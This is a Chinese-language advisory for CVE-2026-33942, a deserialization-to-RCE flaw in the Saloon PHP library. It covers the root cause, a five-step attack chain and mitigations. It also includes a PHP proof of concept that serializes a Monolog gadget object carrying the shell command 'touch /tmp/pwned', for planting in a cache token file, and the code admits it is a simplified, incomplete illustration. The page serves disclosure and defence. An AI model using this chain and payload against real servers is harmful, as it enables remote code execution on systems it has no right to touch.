CVE-2026-33942 CVSS 9.8 严重

CVE-2026-33942 Saloon PHP库反序列化致RCE漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33942

漏洞类型

反序列化漏洞

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Saloon

漏洞概述

Saloon是一个用于构建API集成的PHP库。在4.0.0版本之前，其AccessTokenAuthenticator类在恢复OAuth令牌状态时使用了PHP的unserialize()函数，且未限制允许的类。攻击者若能控制序列化字符串（例如通过覆盖缓存令牌文件或利用其他注入点），可利用此反序列化漏洞注入恶意对象。在存在常见依赖（如Monolog）的环境中，攻击者可利用反序列化链实现远程代码执行（RCE），对系统安全构成严重威胁。

技术细节

该漏洞的根本原因是不安全地使用了PHP的unserialize()函数。具体而言，受影响版本的AccessTokenAuthenticator::unserialize()方法在从缓存或存储恢复令牌时，调用了unserialize()并设置allowed_classes => true。这使得实例化任意类成为可能。攻击者首先需要控制被反序列化的数据内容，例如通过篡改缓存文件。随后，攻击者构造包含恶意“Gadget”链的序列化Payload。当应用处理该数据时，PHP会自动触发Payload中对象的魔术方法（如__wakeup或__destruct）。结合项目中的依赖库（如Monolog），攻击者可以构建POP链，将对象操作导向危险的系统函数，从而导致远程代码执行。版本4.0.0通过移除自动序列化机制修复了此问题。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标应用程序使用了易受攻击版本的Saloon PHP库（< 4.0.0）。

STEP 2

2. 数据注入

攻击者寻找并利用漏洞（如文件写入权限配置不当）来控制AccessTokenAuthenticator读取的缓存令牌文件或存储内容。

STEP 3

3. 载荷构造

攻击者根据目标环境中的依赖库（如Monolog），构造能够导致远程代码执行的恶意序列化对象。

STEP 4

4. 触发漏洞

应用程序在运行过程中调用AccessTokenAuthenticator::unserialize()，解析被篡改的恶意数据。

STEP 5

5. 代码执行

PHP反序列化过程触发恶意对象的魔术方法，利用POP链执行任意系统命令，获取服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// PoC for CVE-2026-33942 - Demonstration of payload generation
// This script generates a malicious serialized object targeting a hypothetical vulnerable chain (e.g., Monolog RCE1)

namespace Monolog\Handler;

class SyslogUdpHandler
{
    protected $socket;
    function __construct($socket)
    {
        $this->socket = $socket;
    }
}

namespace {
    // Payload to execute shell command (e.g., touch /tmp/pwned)
    $cmd = 'touch /tmp/pwned';
    
    // Example Gadget Chain setup (Simplified for illustration)
    // In a real scenario, this requires specific library versions (e.g., Monolog)
    $object = new \Monolog\Handler\SyslogUdpHandler($cmd);
    
    // Generate the serialized payload
    $payload = serialize($object);
    
    echo "Generated Payload:\n";
    echo $payload . "\n";
    
    // An attacker would then overwrite the cache token file with this $payload string.
}
?>

影响范围

Saloon < 4.0.0

防御指南

临时缓解措施

如果无法立即升级，请确保缓存存储位置对Web服务器进程不可写，或使用强加密和签名机制保护存储的令牌数据，以防止篡改。同时，部署Web应用防火墙（WAF）以检测和拦截潜在的恶意序列化攻击尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表